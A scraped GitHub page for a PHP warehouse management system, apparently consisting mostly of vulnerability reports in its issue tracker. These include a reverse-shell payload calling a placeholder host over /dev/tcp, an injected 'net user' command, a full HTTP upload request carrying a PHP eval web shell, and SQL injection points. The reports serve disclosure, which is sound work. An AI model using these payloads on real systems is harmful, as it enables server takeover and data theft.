feminer / wms Goto Github PK

View Code? Open in Web Editor NEW

355.0 355.0 154.0 12.32 MB

企业仓库管理系统

License: MIT License

PHP 90.69% HTML 0.45% CSS 3.31% JavaScript 3.65% Hack 1.90%

wms's People

Contributors

Stargazers

Watchers

Forkers

hiphp7 zhangjian0111 danque1 gavinyyb fushanlang kiratan zhangwenhua029 linziqian vmto wuranjia cokan sharp1229 hui2125281 zhoufoxcn jbzhang99 some-projects qqun xinyu123200 zhangyao813876721 geds1990 chenxuhua rongliang fcmai jackingod im286er marswon peteyan mengyou658 lfclixing zhangaodi zerojuls xuborder fdzfandongze nbyh okligaofeng sky101010ws thornfun laowangba qiaofenlin czjericho jhf646 luleiyu 496405081 macthis eunknight csliangdu hwedwin j1x2h3 dong138 lzpfmh dada94 imasonhuang chinazzlm gordon-shin terryluwenbinbin dxxfire usgram jeff-cn simpledezhu wanglan234 wuchuanbin tobbco littlepsycho lailaiququ abelicwind zhuguangyuan vseal001 tellerattack china-liweihong jackywang janesunflower 94445477 dongzengwu pypwxh igoryang oneteam1912 chenlmz wnark lheee zzq666666 xiahui1986 waffcloud jerryliu306 cpll klsfct samurai258 leefm666 luoqiang035 ryan1000 morelotion dodgerd noobsean wongshixiong stonewongrua dxmcu chenyang77 kongsixing coder321 shixinzi a1rchina

wms's Issues

SQL injection in http://localhost/wms/src/basic/editinout.php

The GET parameter "id" is passed without filtering to SQL sentence which causes the vulnerability.

Remote Command Execution vulnerability in /wms/src/system/datarec.php

A RCE was found in system/datarec.php, the $_POST[r_name] is directly passed into the $mysqlstr, and is executed by exec, which causing a RCE.

POC:
Firstly, start a nc listener:

Next, post a request with parameter:
r_name=$(bash -c 'bash -i >& /dev/tcp/x.x.x.x/8888 0<&1 2>&1')

Finally, you get the reverse shell:

SQL Injection vulnerability in chkuser.php!!!

A critical SQL Injection vulnerability was found in chkuser.php.
The parameter "username" is passed without filtering to SQL sentence which causes the vulnerability.
Hackers can exploit it without authority to get access to your database

你好，下载项目发现，运行起来中文部分会乱码，编码均设置为utf-8的编码，

Command execution vulnerability in /wms/src/system/databak.php

Vulnerability Type :

Command execution

Vulnerability Version :

1.1

Recurring environment:

Windows Server 2012
PHP 5.5.38
Apache 2.4
Mysql 5.6

Vulnerability Description AND recurrence:

During installation, use the db_wms_2013_12_31_15_48_34.sql file in the \system\ directory for installation

In the /system/databak.php file, the parameter filename was received through $_POST, and it was not filtered. The exec function was brought in, resulting in a command execution vulnerability.

There is no echo here, let's test adding a system user here

payload： filename=1 || net user test /add

登录用户名和密码是什么？

SQL injection in http://localhost/wms/src/basic/editinout.php

README.md的图片看不到

货品信息管理不显示

货品信息管理

返回信息：本站暂无货品!

WMS has a file upload code execution vulnerability

Build environment: Apache 2.4.39; MySQL5.0.96； PHP5.3.29

1.in /src/product/addproduct.php，On lines 242-246 of the code

Upfile is a parameter for uploading pictures，

2.Then we come to savenewproduct.php

The upfile from POST is assigned to $upfile

Then let's look at lines 45-64 of the code

It can be seen that the uploaded files are stored in the upimages directory, and the file naming rules are 1.jpg, 2.jpg, and then add 1

3.Therefore, we can construct a poc to execute the file upload command

POC：

POST /product/savenewproduct.php?flag=1 HTTP/1.1
Host: xxxx
Content-Length: 1507
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://wmsvul.test
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryONFXfH9gn2T6Gxal
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://wmsvul.test/product/addproduct.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=qo4cusl0vp4mame43ssakta695
Connection: close

------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="typeid"

0001
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="name"

123123123123
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="encode"

1025
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="barcode"

1025
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="size"

1025
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="unit"

None
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="upperlimit"

1025
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="lowerlimit"

10
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="inprice"

1025
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="outprice"

123
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="MAX_FILE_SIZE"

2000000
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="upfile"; filename="POC.php"
Content-Type: application/octet-stream

<?php @eval($_GET['ace']);?>
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="jianjie"


------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="submit"

添加
------WebKitFormBoundaryONFXfH9gn2T6Gxal--

Since the uploaded file was not verified, the PHP file was uploaded successfully and was named 1.php

Then, we access the PHP file to execute the code

POC：

http://wmsvul.test/product/upimages/1.php?ace=phpinfo();

Create SECURITY.md

Hey there!

I belong to an open source security research community, and a member (@wtwver) has found an issue, but doesn’t know the best way to disclose it.

If not a hassle, might you kindly add a SECURITY.md file with an email, or another contact method? GitHub recommends this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future.

Thank you for your consideration, and I look forward to hearing from you!

(cc @huntr-helper)